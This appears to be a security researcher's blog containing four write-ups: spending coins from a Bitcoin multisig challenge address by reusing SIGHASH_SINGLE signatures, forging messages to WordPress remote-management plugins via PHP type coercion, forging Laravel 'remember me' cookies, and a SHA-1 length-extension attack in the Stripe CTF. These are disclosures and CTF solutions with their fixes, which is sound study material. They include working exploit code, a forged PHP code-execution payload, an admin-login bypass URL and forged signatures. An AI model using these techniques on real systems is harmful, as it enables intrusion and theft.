Exploiting Bitcoin's SIGHASH_SINGLE signature type

Coinspect, a new Bitcoin focused security company, recently disclosed technical details of an attack against Copay’s multisignature wallets. At the same time they issued a challenge to recover the Bitcoins that had been used to test the Copay exploit. This post will go over the details of this challenge and how to solve it.

When the challenge started there were two unspent transaction outputs associated with the target Bitcoin address. It appeared that the challenge would be to find some way to spend these outputs without knowledge of the private keys that are normally required to sign a transaction.

Throughout this post I am going to make use of pybitcointools to perform Bitcoin related operations from the command line.

Redeeming a Bitcoin transaction

A Bitcoin transaction moves coins between one or more inputs and outputs. Each input spends the coins paid to a previous output, and each output waits as an unspent transaction output until it is spent as an input to a later transaction.

An output contains the amount that has been transferred and a script that describes the conditions that must be met in order for the output to be spent. An input references an output in a previous transaction — a transaction ID (the hash of the transaction data) and output index — and provides a script, known as the scriptSig, that satifies the output script conditions.

In the simplest case, a Bitcoin address is the hash of a user’s public key. In order to send some Bitcoin to this user a pay-to-public-key-hash (P2PKH) transaction output is created. The P2PKH output script contains instructions that allow the owner of the private key that corresponds to the hashed public key to spend the output. Such a script looks like this:

OP_DUP OP_HASH160 <PublicKeyHash> OP_EQUALVERIFY OP_CHECKSIG

The corresponding scriptSig that redeems this output is simply two pieces of data: the receivers public key, and a signature of the transaction data with the private key. (Note that the signature is of the new transaction that is spending the previous output). Not only does the signature prove ownership of the expected private key, but it also protects the new transaction against modification.

In order to verify a transaction the output script is appended to the scriptSig:

<Sig> <PublicKey> OP_DUP OP_HASH160 <PublicKeyHash> OP_EQUALVERIFY OP_CHECKSIG

This entire script is then evaluated. If the resulting stack has the value true at the top then the transaction is valid.

In this example of the most common form of transaction the OP_EQUALVERIFY and OP_CHECKSIG instructions must both complete successfully. OP_EQUALVERIFY will check that the public key provided in the scriptSig matches the expected hash in the output script, and OP_CHECKSIG will verify the signature of the transaction against the public key. For a full run through of the script execution see the Bitcoin developer guide on P2PKH Script Validation.

P2SH Addresses

With a basic understanding of Bitcoin transactions it is now time to take a look at the two unspent transactions associated with the target wallet:

>>> target = '32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe'
>>> unspent(target)
[{'output': '8602122a7044b8795b5829b6b48fb1960a124f42ab1c003e769bbaad31cb2afd:0', 'value': 677200}, {'output': 'bd992789fd8cff1a2e515ce2c3473f510df933e1f44b3da6a8737630b82d0786:0', 'value': 5000000}]
# Get the outputs of each transaction
>>> deserialize(fetchtx('8602122a7044b8795b5829b6b48fb1960a124f42ab1c003e769bbaad31cb2afd'))['outs'][0]
{'value': 677200, 'script': 'a91406612b7cb2027e80ec340f9e02ffe4a9a59ba76287'}
>>> deserialize(fetchtx('bd992789fd8cff1a2e515ce2c3473f510df933e1f44b3da6a8737630b82d0786'))['outs'][0]
{'value': 5000000, 'script': 'a91406612b7cb2027e80ec340f9e02ffe4a9a59ba76287'}

Decoding the output script produces the following opcodes:

OP_HASH160 06612b7cb2027e80ec340f9e02ffe4a9a59ba762 OP_EQUAL

which looks nothing like the common P2PKH output script described above. It looks like that ‘all’ that’s necessary to spend these outputs is to find a value that when hashed (with SHA-256 and then RIPEMD-160) matches 06612b7cb2027e80ec340f9e02ffe4a9a59ba762. However, it turns out that this is actually another type of transaction known as pay-to-script-hash (P2SH).

In order to spend a P2SH output the scriptSig must push a serialized script, known as the redeemScript, onto the stack which has a hash that matches the one in the output script. If the hashes match, i.e. the OP_EQUAL instruction in the output script has returned true, then the redeemScript is deserialized and evaluated. The transaction is valid if the redeemScript matches the expected hash and it returns true.

Let’s look at some previous transactions from the target address and see what the redeemScript does:

# Get an existing scriptSig
>>> deserialize(fetchtx('6102bfd4bad33443bcb99765c0751b6b8e4e65f4db4e3b65324c5e9e3dac8132'))['ins'][0]
{'script': '00483045022100e5d7c59ea1fb5d0285e755dfc09634e1e3af36d12950b9b5d5f92b136021b3d202202c181129443b08dcfb8d9ced30187186c57c96f9cdb3f3914e0798682ea35d2b03493046022100e1f8dbad16926cfa3bf61b66e23b3846323dcabf6c75748bcfad762fc50bfaf402210081d955160b5f8d2b9d09d8838a2cf61f5055009d9031e0e106e19ebab234d949034c695221023927b5cd7facefa7b85d02f73d1e1632b3aaf8dd15d4f9f359e37e39f05611962103d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b802103ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df53ae', 'outpoint': {'index': 1, 'hash': 'ec2a40cac3ac5dadf1d31f3cad03bdc8465caab5acbc5407ee7f4a7400aab577'}, 'sequence': 4294967295}
# Confirm that the corresponding output script matches the one discovered above
>>> deserialize(fetchtx('ec2a40cac3ac5dadf1d31f3cad03bdc8465caab5acbc5407ee7f4a7400aab577'))['outs'][1]
{'value': 350000, 'script': 'a91406612b7cb2027e80ec340f9e02ffe4a9a59ba76287'}

Decoding the scriptSig gets:

OP_FALSE 304502... 304602... 5221023927b5cd7facefa7b85d02f73d1e1632b3aaf8dd15d4f9f359e37e39f05611962103d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b802103ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df53ae

We can manually verify that the final value that’s pushed onto the stack does match the expected hash in the output script:

>>> import hashlib
>>> data = "5221023927b5cd7facefa7b85d02f73d1e1632b3aaf8dd15d4f9f359e37e39f05611962103d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b802103ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df53ae".decode("hex")
>>> data = hashlib.sha256(data).digest()
>>> hashlib.new('ripemd160', data).hexdigest()
'06612b7cb2027e80ec340f9e02ffe4a9a59ba762'

Therefore this is the redeemScript. Decoding it produces the following instructions:

2 023927... 03d2c0... 03ec01... 3 OP_CHECKMULTISIG

OP_CHECKMULTISIG takes a number of signatures and a number of public keys. Each signature and public key pair is checked with OP_CHECKSIG for validity. In order for OP_CHECKMULTISIG to return true all of the signatures must match one of the public keys. In this case there are two signatures which are provided by the scriptSig and three public keys which are included in the redeemScript. The OP_FALSE instruction in the scriptSig is required due to a bug which means that OP_CHECKMULTISIG removes an extra, unused value from the stack.

Therefore, the target address is a multisignature wallet that has three associated public keys. In order to spend an output two valid signatures are required in the scriptSig (along with the redeemScript).

Signature hash types

Bitcoin supports transaction signatures that only validate portions of the transaction. There are three signature hash types:

  • SIGHASH_ALL: All inputs and outputs are signed. This is the default signature hash type.
  • SIGHASH_NONE: All of the inputs are signed, but none of the outputs are.
  • SIGHASH_SINGLE: Only the corresponding input and output (the output with the same index number as the input) are signed.

The signature hash type is specified by the last byte of a signature in the scriptSig. Transaction 6102bfd4... has three inputs. Here are the ends of the two signatures from each of the scriptSigs:

OP_FALSE ...5d2b03 ...d94903 <redeemScript>
OP_FALSE ...069803 ...182503 <redeemScript>
OP_FALSE ...7c2903 ...10b803 <redeemScript>

All of the signatures end in the value 0x03 which identifies them as SIGHASH_SINGLE signatures: the signature only covers the input itself and the output with the same index number. But there are three inputs and only two outputs; there is no corresponding output for the input with index two. What happens when it comes to creating the signature for this input?

It turns out that, due to a bug, if an output with the same index does not exist then the integer value one will be returned as the hash of the transaction. This appears to have been first described by Peter Todd on the bitcointalk forum. We can verify this behaviour in a Python shell:

>>> pubs = ['023927b5cd7facefa7b85d02f73d1e1632b3aaf8dd15d4f9f359e37e39f0561196', '03d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b80', '03ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df']
>>> sigs = [der_decode_sig('3045022100dfcfafcea73d83e1c54d444a19fb30d17317f922c19e2ff92dcda65ad09cba24022001e7a805c5672c49b222c5f2f1e67bb01f87215fb69df184e7c16f66c1f87c2903'), der_decode_sig('304402204a657ab8358a2edb8fd5ed8a45f846989a43655d2e8f80566b385b8f5a70dab402207362f870ce40f942437d43b6b99343419b14fb18fa69bee801d696a39b3410b803')]
>>> hash = '\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
>>> ecdsa_raw_verify(hash, sigs[0], pubs[0])
True
>>> ecdsa_raw_verify(hash, sigs[1], pubs[1])
True

This means that it should be possible to forge a valid scriptSig for another transaction by reusing these signatures on inputs that do not have a corresponding output!

Stealing coins in a new transaction

We want to create a transaction with a single output to an address that we control. This requires one input from an address we control to force the input index for the two inputs from the target transactions above zero. Here are the commands that I ran to create such a transaction:

# My address
>>> addr
'1Lyafe8mSqubnynbAWPcXbHE5pnHMzEnT3'
# Unspent transaction outputs (legitimately) under my control
>>> unspent(addr)
[{'output': '23e81960ba8bb95c33c2336c84c126e378e4d1123921f881da9247c25f524161:1', 'value': 300000}]
# Target address and unspent transaction outputs
>>> target = '32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe'
>>> unspent(target)
[{'output': '8602122a7044b8795b5829b6b48fb1960a124f42ab1c003e769bbaad31cb2afd:0', 'value': 677200}, {'output': 'bd992789fd8cff1a2e515ce2c3473f510df933e1f44b3da6a8737630b82d0786:0', 'value': 5000000}]
# The unspent outputs are the inputs to the new transaction
>>> ins = unspent(addr) + unspent(target)
# Amount to send in the transaction
# Sum of the three inputs minus a fee for the block miner
>>> amount = 300000 + 5000000 + 677200
>>> amount -= 10000
# Single output to my address
>>> outs = [{'address': addr, 'value': value}]
# Create a new transaction from these inputs and outputs
>>> tx = mktx(ins, outs)
# Sign the first input with my private key
>>> tx = sign(tx, 0, priv)
>>> tx = deserialize(tx)
# Add the scriptSigs containing SIGHASH_SINGLE signatures of 1
>>> tx['ins'][1]['script'] = '00483045022100dfcfafcea73d83e1c54d444a19fb30d17317f922c19e2ff92dcda65ad09cba24022001e7a805c5672c49b222c5f2f1e67bb01f87215fb69df184e7c16f66c1f87c290347304402204a657ab8358a2edb8fd5ed8a45f846989a43655d2e8f80566b385b8f5a70dab402207362f870ce40f942437d43b6b99343419b14fb18fa69bee801d696a39b3410b8034c695221023927b5cd7facefa7b85d02f73d1e1632b3aaf8dd15d4f9f359e37e39f05611962103d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b802103ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df53ae'
>>> tx['ins'][2]['script'] = '00483045022100dfcfafcea73d83e1c54d444a19fb30d17317f922c19e2ff92dcda65ad09cba24022001e7a805c5672c49b222c5f2f1e67bb01f87215fb69df184e7c16f66c1f87c290347304402204a657ab8358a2edb8fd5ed8a45f846989a43655d2e8f80566b385b8f5a70dab402207362f870ce40f942437d43b6b99343419b14fb18fa69bee801d696a39b3410b8034c695221023927b5cd7facefa7b85d02f73d1e1632b3aaf8dd15d4f9f359e37e39f05611962103d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b802103ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df53ae'
>>> serialize(tx)
'01000000036141525fc24792da81f8213912d1e478e326c18...'

I sent this pushed this transaction out onto the network: 791fe035d312dcf9196b48649a5c9a027198f623c0a5f5bd4cc311b8864dd0cf. The coins were now mine!

This entry was posted on 08 August 2014.

The dangers of type coercion and remote management plugins

Remote management plugins are a popular tool among WordPress site administrators. They allow the user to perform the same action on multiple sites at once, e.g. updating to the latest release or installing a plugin. However, in order to perform these actions the client plugins need to provide a lot of power to a remote user. Therefore it is very important that the communication between the management server and the client plugin is secure and cannot be forged by an attacker. I decided to take a look at some of the available plugins for weaknesses that would allow an attacker to completely compromise a site running one of these plugins.

ManageWP, InfiniteWP, and CMS Commander

These three services share the same code base for the client plugin (I believe it’s originally authored by ManageWP and used by the other two with some tweaks) and so they were all vulnerable to a signature bypass that would allow remote code execution.

Instead of requiring the user to provide administrator credentials, the management server registers a secret key with the client plugin which is used to compute a MAC for each message. A MAC is calculated by taking a message and passing it through a MAC algorithm along with a shared secret key. The message is then sent with the MAC attached. Finally, the recipient can recalculated the MAC of the sent message and check it against the MAC that was attached. MACs are used to verify the authenticity and integrity of a message, i.e. it was sent by the management server and has not been changed in transit. This is a good approach to securing communications, but implementation flaws in the client plugin for these three services lead to a critical security vulnerability.

An incoming message is authenticated by helper.class.php like this:

// $signature is the MAC sent with the message  
// $data is part of the message  
if (md5($data . $this->get_random_signature()) == $signature) {  
    // valid message  
}

The use of non-strict equality means that type juggling occurs before comparison. The output of the md5() function is always a string, but if $signature is an integer then the type coercion can make it relatively easy to forge a matching MAC. For example, if the true MAC starts with “0″ or a non-numeric character then the integer zero will match, if it starts “1x” (where “x” is non-numeric) then the integer 1 will match, and so on.

var_dump('abcdefg' == 0); // true  
var_dump('1abcdef' == 1); // true  
var_dump('2abcdef' == 2); // true

Unfortunately, an attacker can provide an integer as a signature. In init.php incoming requests are parsed by using base64_decode() and then unserializing the result. The use of unserialize() means that an attacker can provide types for the input data. An example of a forged, serialized message is:

a:4:{s:9:"signature";i:0;s:2:"id";i:100000;s:6:"action";s:16:"execute_php_code";s:6:"params";a:2:{s:8:"username";s:5:"admin";s:4:"code";s:25:"exec('touch /tmp/owned');";}}

This message provides the signature as the integer 0 and uses the execute_php_code action provided by the plugin to execute arbitrary PHP code.

$signature = 0;  
// $data is the action concatenated with the message ID  
$data = 'execute_php_code' . 100000;  
if (md5($data . $this->get_random_signature()) == $signature) {  
    // valid message if the output of  
    // md5() doesn't start with a digit  
}

This example forgery is not guaranteed to work straight away. First of all the id key needs to have a value greater than previous legitimate messages (the use of increasing message IDs is being used to prevent replay attacks). Secondly, a matching integer is required for the signature. These two requirements can be bruteforced relatively quickly:

for i from 100,000 to 100,500:
    for j from 0 to 9:
        submit request with id i and signature j

This pseudocode will attempt to send fake messages with very large IDs and for each ID that is attempted ten single digit signatures are used to try and get a match.

This flaw can be fixed by using strict equality (===) and performing other sanity checks on incoming signatures. Fixes were released only changing to strict equality by ManageWP on 19th February, InfiniteWP on 21st February, and CMS Commander on 28th February.

A couple of other problems were reported, but they have not yet been acted on. First, the secret suffix MAC construction used (the secret key is appended to $data and then hashed) has some weaknesses and HMAC should be used instead. Secondly, only the action and message ID are used to create a signature. This means that an active network attacker could change the parameters in a message and the signature would still be valid (e.g. change an execute_php_code message to execute malicious code). To prevent this the MAC should cover the entire message.

(Note that the MD5 based MAC algorithm is a fallback and these client plugins attempt to use openssl_verify() where it is available.)

Worpit

Worpit is another remote management service, but it uses a client plugin built from scratch. It is also vulnerable to a type coercion bug that allows an attacker to log in with administrator privileges.

This client plugin provides a method of remote administrator login “using temporary tokens only configurable by the Worpit package delivery system”. The plugin checks that the token provided in the request matches the one stored in the database:

if ( $_GET['token'] != $oWpHelper->getTransient( 'worpit_login_token' ) ) {  
    die( 'WorpitError: Invalid token' );  
}

The token is deleted from the database once used. This means that most of the time there is no token in the database. Therefore the call to the getTransient() method is likely to return false. Non-strict comparison is used which means that any ‘falsey’ value, such as the string 0, will be treated as a valid token. An example URL to login as administrator:

http://victim/?worpit_api=1&m=login&token=0

From here the site is completely compromised as the attacker has full privileges to install malicious plugins or edit existing ones.

Again the fix is to use strict equality (!==) and to perform other sanity checks on the provided token and the one retrieved from the database. A fix was released on 10th February.

Conclusion

Always remember to check that user input is of the expected type and use strict comparison in security critical functions, such as checking authentication tokens.

This entry was posted on 01 March 2013.

Lying to Laravel

A vulnerability in the authentication system of the Laravel PHP framework allowed attackers to authenticate as any registered user.

The authentication Driver base class uses a method called recall() to retrieve a “remember me” cookie from the user. The cookie’s contents is decrypted, split on the ‘|’ character, and the first piece is taken as a user ID. This ID is then looked up in the database and if a matching record is found then the visitor is deemed to be authenticated as the corresponding user.

/**
 * Attempt to find a "remember me" cookie for the user.
 *
 * @return string|null
 */
protected function recall()  
{  
    $cookie = Cookie::get($this->recaller());
    
    // By default, "remember me" cookies are encrypted and contain the user  
    // token as well as a random string. If it exists, we’ll decrypt it  
    // and return the first segment, which is the user’s ID token.  
    if ( ! is_null($cookie))  
    {  
        return head(explode('|', Crypter::decrypt($cookie)));  
    }  
}

However, encryption isn’t authentication. An attacker is able to choose any ciphertext they wish and have the application attempt to decrypt it. So, ‘all’ that has to be done to authenticate as a user with a single digit ID is to find a ciphertext that decrypts to a digit followed by a ‘|’. Any random string can follow the pipe as it will be ignored by Laravel.

Finding an appropriate ciphertext takes a relatively short amount of time with a bruteforce search. The attacker chooses two random strings with the same length as the block size of the cipher — Laravel uses Rijndael-256 so this is 32 bytes. These will be the initialisation vector (IV) and a block of ciphertext. A double loop is then run to try every combination of bytes for the first two bytes of the IV. On each iteration, the concatenation of the IV and ciphertext block are submitted to the target as the value of the “remember me” cookie. A check on the response from the application is used to determine if authentication occurred successfully, e.g. check for a string like “Welcome ”. If the cookie test returns true then the search is complete as a valid cookie has been found. Otherwise, the first two bytes of the IV are reset and the loop continues. The following is some pseudo-code that performs this search:

iv <- 32 byte random string
ciphertext <- 32 byte random string

for i from 0 to 255:
  for j from 0 to 255:
    iv[0] ^= i
    iv[1] ^= j

    if check_cookie(iv + ciphertext):
      return iv + ciphertext

    iv[0] ^= i
    iv[1] ^= j

This attack will take a maximum of 256 * 256 = 65536 requests to create an authenticator for a user with a single digit ID. From there it’s possible to authenticate as any single digit ID by working out which ID was forged and using this information to modify the first byte of the IV appropriately. The ID xor’d with the first by of the IV produces the first byte from the output of the block cipher. This value can then be xor’d with the target digit to get the new byte for the IV.

Adding extra digits requires a maximum of 256 further requests per go. For example, to go from one to two digits you would modify the second byte of the IV to change the ‘|’ into a digit and then loop until a ‘|’ is produced at the third byte.

The solution to this problem is to append a message authentication code (MAC) to cookies. This allows the application to verify that it created any received cookie data before it is used. Laravel has added MACs to cookies in 3.2.8 (released 26th September) and is using HMAC-SHA1 as the MAC algorithm.

Interestingly, at the time of discovery, both the Laravel documentation and the entry on Wikipedia listed “cookie tampering prevention” through the use of a “signature hash” as a feature. Unfortunately this was not actually the case.

In the future, it would be good to see Laravel’s Crypter class have MACs built in so that all encrypted messages are verified before decryption. Examples of this type of behaviour can be seen in Zend Framework 2 and Ruby on Rails.

This entry was posted on 13 October 2012.

I captured the flag!

Last week, Stripe launched their second capture the flag competition. Unlike the CTF they held in February, this version involved web-based vulnerabilities and exploits instead of lower-level problems. Also unlike the first CTF run by Stripe I was able to complete the last level and capture the flag!

I know that there are many write-ups of all of the different levels already, so I just want to talk about the technical details of my favourite level.

Welcome to the penultimate level, Level 7.

WaffleCopter is a new service delivering locally-sourced organic waffles hot off of vintage waffle irons straight to your location using quad-rotor GPS-enabled helicopters. The service is modeled after TacoCopter, an innovative and highly successful early contender in the airborne food delivery industry. WaffleCopter is currently being tested in private beta in select locations.

Your goal is to order one of the decadent Liège Waffles, offered only to WaffleCopter’s first premium subscribers.

Log in to your account at https://level07-2.stripe-ctf.com/user-xxxxxxxxxx with username ctf and password password. You will find your API credentials after logging in.

Looking at the code for level 7 showed that the /orders API endpoint didn’t have any obvious way to bypass signature verification or order premium waffles as the ctf user. So, I started to look elsewhere. Almost immediately I spotted that although the /logs/:id route requires authentication it doesn’t stop authenticated users from viewing the API request logs of other users. By visiting /logs/1 it’s possible to view the requests of a premium user ordering some waffles. Unfortunately they hadn’t ordered the target Liège waffle so it seems that all that can be done is replay requests for unwanted waffles, right?

At this point I had to leave to walk to work. This turned out to be a good thing, on this ‘ponder wander’ I realised that, whilst investigating the benefits of HMAC in the past, I had read about attacks on the signature creation method that was being employed. If it’s possible to take an old request from a premium user, change the ordered waffle to the target and then create a valid MAC then the password can be found.

Length extension attacks

def verify_signature(user_id, sig, raw_params):
    # get secret token for user_id
    try:
        row = g.db.select_one('users', {'id': user_id})
    except db.NotFound:
        raise BadSignature('no such user_id')
    secret = str(row['secret'])

    h = hashlib.sha1()
    h.update(secret   raw_params)
    print 'computed signature', h.hexdigest(), 'for body', repr(raw_params)
    if h.hexdigest() != sig:
        raise BadSignature('signature does not match')
    return True

Above is the code used by the WaffleCopter server to verify a signed request. The signature for a request is calculated by taking the body of the request (the message), appending it to the user specific secret and computing the SHA-1 hash of the result. This is a weak method of creating a MAC because for some hash functions, like SHA-1, it is possible to compute H(m || padding(m) || m') for any m' given H(m) where where m is unknown (|| denotes concatenation).

Length extension is possible on all hash functions that make use of the Merkle–Damgård construction to build a hash function which accepts arbitrarily sized input from a one-way compression function that only accepts fixed size inputs.

Merkle-Damgård hash construction

The image above shows the construction of a hash function from a one-way compression function f which takes fixed size two inputs and produces a fixed sized output the same size as one of the inputs. First, the input message is broken up into blocks of the correct size. The compression function is repeatedly applied to successive blocks of the input message along with the output of the previous function application. The first message block is compressed along with a public initialization vector (IV) that is algorithm specific. The final block is padded as necessary so that it is the appropriate size for the compression function. The result of the final compression is the hash for the input message.

It should now be pretty easy to see how H(m || padding(m) || m') can be calculated for an arbitrary m' given H(m). It is computed by producing H(m') but with the value of H(m) being used in place of the hash function’s standard initialization vector.

With this knowledge it is now possible to create a valid MAC when MAC = H(K M) where K is a secret and M is the message. All that needs to be known is the length of K and any message M and its associated MAC C. This is done by working out the padding that the hash function would add automatically during the computation of C and appending it to M: M' = M || padding. The amount of padding to use is determined by adding the lengths of K and M modulo the block size required by the compression function. Extra data can then be appended to create M'' = M' || extra. The valid MAC for our new message M'' is H(M'') when using C as the value of the IV.

So, back to level 7 of the Stripe CTF. Take one of the signed API requests for a premium user:

count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo|sig:11de8a0bc70d80ffe6b25d34c0711cd450ebdd29

M is the piece before the pipe and C is the piece after “sig:”. The extra data to extend the message with is &#038;waffle=liege so that the requested waffle parameter in the original message is overwritten with the name of the target. By using the length extension attack described above it’s possible to create M'':

count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x28&waffle=liege

and a valid MAC:

37c9dcaef9a370feb2daf97211a1bbb273812753

The password for level 8 could then be found by POSTing the concatenation of M'', “|sig:” and the new MAC to the orders API endpoint. The request will be verified as having been made by user 1 (a premium user) ordering a Liège waffle.

During the CTF I created the extended message and its MAC by taking a Python implementation of SHA-1 and hacking up it’s internal state. This was much harder than it could have been as it turns out that there is an existing tool for creating extended messages and new MACs.

Overall the CTF was thoroughly enjoyable and I hope that Stripe (and others) continue to create these fun security challenges in the future.

This entry was posted on 30 August 2012.